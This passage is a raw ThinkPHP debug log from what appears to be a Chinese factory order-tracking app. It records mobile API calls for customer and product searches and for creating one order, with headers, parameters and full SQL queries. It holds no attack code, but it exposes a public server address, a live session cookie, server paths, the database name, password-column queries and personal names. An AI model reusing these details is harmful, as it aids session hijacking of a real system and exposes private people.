factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000478s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `factorymge_id` = 26 AND `jobmge_id` = 8 [ RunTime:0.000360s ] --------------------------------------------------------------- [ 2025-12-14T16:37:00+08:00 ] 39.144.91.198 POST /api/kehu/getkehubykeyword?staff_id=19&keyword=&offset=0&pageNum=15 [ info ] 47.105.33.115:8081/api/kehu/getkehubykeyword?staff_id=19&keyword=&offset=0&pageNum=15 [运行时间:0.043196s][吞吐率:23.15req/s] [内存消耗:4,572.37kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001128s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubykeyword', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '19', 'keyword' => '', 'offset' => '0', 'pageNum' => '15', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001467s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubykeyword[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000683s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000975s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000734s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000578s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000690s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `factorymge_id` = 26 AND `normalstatus` = '1' AND `name` LIKE '%%' ORDER BY `createtime` DESC LIMIT 0,15 [ RunTime:0.000785s ] --------------------------------------------------------------- [ 2025-12-14T16:37:02+08:00 ] 39.144.91.198 POST /api/kehu/getkehubykeyword?staff_id=19&keyword=%E6%B2%88&offset=0&pageNum=15 [ info ] 47.105.33.115:8081/api/kehu/getkehubykeyword?staff_id=19&keyword=%E6%B2%88&offset=0&pageNum=15 [运行时间:0.040332s][吞吐率:24.79req/s] [内存消耗:4,564.41kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000042s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001210s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubykeyword', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '19', 'keyword' => '沈', 'offset' => '0', 'pageNum' => '15', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001499s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubykeyword[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000430s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000839s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000621s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000466s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000752s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `factorymge_id` = 26 AND `normalstatus` = '1' AND `name` LIKE '%沈%' ORDER BY `createtime` DESC LIMIT 0,15 [ RunTime:0.000840s ] --------------------------------------------------------------- [ 2025-12-14T16:37:04+08:00 ] 39.144.91.198 POST /api/kehu/getkehubyid?staff_id=19&kehuId=32 [ info ] 47.105.33.115:8081/api/kehu/getkehubyid?staff_id=19&kehuId=32 [运行时间:0.044161s][吞吐率:22.64req/s] [内存消耗:4,555.82kb] [文件加载:76] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001234s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'kehu', 2 => 'getkehubyid', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'staff_id' => '19', 'kehuId' => '32', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001677s ] [ info ] [ RUN ] app\api\controller\Kehu->getkehubyid[ /alidata/www/gendan/application/api/controller/Kehu.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000431s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000886s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000713s ] [ sql ] [ SQL ] SELECT `staffinfo`.`id`,`staffinfo`.`name`,`staffinfo`.`jobmge_id`,`staffinfo`.`accout_num`,`staffinfo`.`phone_num`,`staffinfo`.`accout_pwd`,`staffinfo`.`salt`,`staffinfo`.`staff_status`,`staffinfo`.`admin_id`,`staffinfo`.`factorymge_id`,`staffinfo`.`createtime`,`staffinfo`.`updatetime`,`staffinfo`.`portrait`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime FROM `ot_staffinfo` `staffinfo` LEFT JOIN `ot_factorymge` `factorymge` ON `staffinfo`.`factorymge_id`=`factorymge`.`id` WHERE `staffinfo`.`id` = '19' LIMIT 1 [ RunTime:0.000442s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000784s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` = 32 LIMIT 1 [ RunTime:0.000262s ] --------------------------------------------------------------- [ 2025-12-14T16:37:05+08:00 ] 39.144.91.198 POST /api/office/product/getproductbywords?userId=19&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=19&keywords=&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.042577s][吞吐率:23.49req/s] [内存消耗:4,452.77kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001291s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'keywords' => '', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001608s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000449s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.001002s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000347s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000760s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 26 AND ( `name` LIKE '%%' OR `product_num` LIKE '%%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.001916s ] --------------------------------------------------------------- [ 2025-12-14T16:37:05+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020861s][吞吐率:47.94req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000069s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001166s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:08+08:00 ] 39.144.91.198 POST /api/office/product/getproductbywords?userId=19&keywords=%E7%89%B9%E5%A4%A7&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=19&keywords=%E7%89%B9%E5%A4%A7&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.041836s][吞吐率:23.90req/s] [内存消耗:4,453.30kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001227s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'keywords' => '特大', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001544s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000465s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000889s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000408s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000924s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 26 AND ( `name` LIKE '%特大%' OR `product_num` LIKE '%特大%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.002078s ] --------------------------------------------------------------- [ 2025-12-14T16:37:09+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022963s][吞吐率:43.55req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001276s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:09+08:00 ] 39.144.91.198 POST /api/office/product/getproductbywords?userId=19&keywords=%E7%89%B9%E5%A4%A7%E6%B2%B9%E4%BD%8D%E8%AE%A1&offset=0&pageNum=10&isAdd=0&faProductId=0 [ info ] 47.105.33.115:8081/api/office/product/getproductbywords?userId=19&keywords=%E7%89%B9%E5%A4%A7%E6%B2%B9%E4%BD%8D%E8%AE%A1&offset=0&pageNum=10&isAdd=0&faProductId=0 [运行时间:0.047296s][吞吐率:21.14req/s] [内存消耗:4,453.02kb] [文件加载:73] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001295s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.product', 2 => 'getproductbywords', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'keywords' => '特大油位计', 'offset' => '0', 'pageNum' => '10', 'isAdd' => '0', 'faProductId' => '0', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001895s ] [ info ] [ RUN ] app\api\controller\office\Product->getproductbywords[ /alidata/www/gendan/application/api/controller/office/Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000548s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000929s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000325s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000789s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE ( 1=1 ) AND `factorymge_id` = 26 AND ( `name` LIKE '%特大油位计%' OR `product_num` LIKE '%特大油位计%' ) AND `product_status` = '1' ORDER BY kucun asc LIMIT 0,10 [ RunTime:0.002403s ] --------------------------------------------------------------- [ 2025-12-14T16:37:09+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.022320s][吞吐率:44.80req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000052s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001390s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:11+08:00 ] 39.144.91.198 POST /api/office/callcurtain/getDetailCurtainByProId [ info ] 47.105.33.115:8081/api/office/callcurtain/getDetailCurtainByProId [运行时间:0.040213s][吞吐率:24.87req/s] [内存消耗:4,481.88kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001152s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.callcurtain', 2 => 'getDetailCurtainByProId', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '23', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'productId' => '554', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001592s ] [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\api\controller\office\Callcurtain->getDetailCurtainByProId[ /alidata/www/gendan/application/api/controller/office/Callcurtain.php ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000484s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_callcurtain` [ RunTime:0.000820s ] [ sql ] [ SQL ] SELECT * FROM `ot_callcurtain` WHERE `productinfo_id` = 554 [ RunTime:0.000344s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000684s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 554 LIMIT 1 [ RunTime:0.000357s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_techprocess` [ RunTime:0.000701s ] [ sql ] [ SQL ] SELECT * FROM `ot_techprocess` WHERE `productinfo_id` = 554 AND `process_status` = '1' [ RunTime:0.000925s ] --------------------------------------------------------------- [ 2025-12-14T16:37:11+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.019243s][吞吐率:51.97req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001207s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:37:20+08:00 ] 39.144.91.198 POST /api/office/buildorder/buildNewOrderV3 [ info ] 47.105.33.115:8081/api/office/buildorder/buildNewOrderV3 [运行时间:0.083581s][吞吐率:11.96req/s] [内存消耗:4,879.55kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001088s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.buildorder', 2 => 'buildNewOrderV3', ), ) [ info ] [ HEADER ] array ( 'content-type' => 'application/x-www-form-urlencoded', 'content-length' => '360', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'number' => '', 'kehu_id' => '32', 'order_connect' => '沈家', 'productinfo_id' => '554', 'zuixinshuoming' => '', 'actual_amount' => '21', 'kucun_amount' => '0', 'produce_amount' => '21', 'price' => '10.5', 'responsible_staffinfos' => '20', 'responsible_staffinfovars' => '杨国德', 'build_time' => '1765641600', 'end_time' => '1765727999', 'remind_day' => '1', 'order_status' => '1', 'childInfo' => '[]', 'proMatInfo' => '[]', 'matMatInfo' => '[]', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001475s ] [ info ] [ RUN ] app\api\controller\office\Buildorder->buildNewOrderV3[ /alidata/www/gendan/application/api/controller/office/Buildorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000513s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000835s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 554 LIMIT 1 [ RunTime:0.000363s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000720s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ RunTime:0.000332s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000881s ] [ sql ] [ SQL ] SELECT * FROM `ot_orderinfo` WHERE `factorymge_id` = 26 AND `pid` = 0 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000452s ] [ sql ] [ SQL ] UPDATE `ot_productinfo` SET `takeup_kucun`=21,`updatetime`=1765701440 WHERE `id` = 554 [ RunTime:0.005946s ] [ sql ] [ SQL ] INSERT INTO `ot_orderinfo` (`number` , `kehu_id` , `order_connect` , `zuixinshuoming` , `actual_amount` , `kucun_amount` , `responsible_staffinfos` , `responsible_staffinfovars` , `productinfo_id` , `produce_amount` , `price` , `build_time` , `end_time` , `remind_day` , `order_status` , `nei_number` , `createtime` , `updatetime` , `factorymge_id` , `build_order_staffid`) VALUES ('' , 32 , '沈家' , '' , 21 , 0 , '20' , '杨国德' , 554 , 21 , 10.5 , 1765641600 , 1765727999 , 1 , '1' , '2512-000118' , 1765701440 , 1765701440 , 26 , 19) [ RunTime:0.006727s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderandstaff` [ RunTime:0.000761s ] [ sql ] [ SQL ] DELETE FROM `ot_orderandstaff` WHERE `orderinfo_id` = 53632 [ RunTime:0.019324s ] [ sql ] [ SQL ] INSERT INTO `ot_orderandstaff` (`orderinfo_id` , `productinfo_id` , `kehu_id` , `staffinfo_id` , `createtime` , `factorymge_id`) VALUES (53632 , 554 , 32 , 20 , 1765701440 , 26) [ RunTime:0.006429s ] --------------------------------------------------------------- [ 2025-12-14T16:37:20+08:00 ] 39.144.91.198 POST /api/office/officeorder/getorderlist?userId=19&keywords=&shenhe=1&offset=0&pageNum=10 [ info ] 47.105.33.115:8081/api/office/officeorder/getorderlist?userId=19&keywords=&shenhe=1&offset=0&pageNum=10 [运行时间:0.079341s][吞吐率:12.60req/s] [内存消耗:4,914.45kb] [文件加载:78] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001162s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'api', 1 => 'office.officeorder', 2 => 'getorderlist', ), ) [ info ] [ HEADER ] array ( 'content-length' => '0', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', 'cookie' => 'PHPSESSID=uil72nesf0eb2tbgeshmueif04', 'user-agent' => 'okhttp/3.7.0', ) [ info ] [ PARAM ] array ( 'userId' => '19', 'keywords' => '', 'shenhe' => '1', 'offset' => '0', 'pageNum' => '10', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/api/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001516s ] [ info ] [ RUN ] app\api\controller\office\Officeorder->getorderlist[ /alidata/www/gendan/application/api/controller/office/Officeorder.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000349s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_staffinfo` [ RunTime:0.000863s ] [ sql ] [ SQL ] SELECT * FROM `ot_staffinfo` WHERE `id` = 19 LIMIT 1 [ 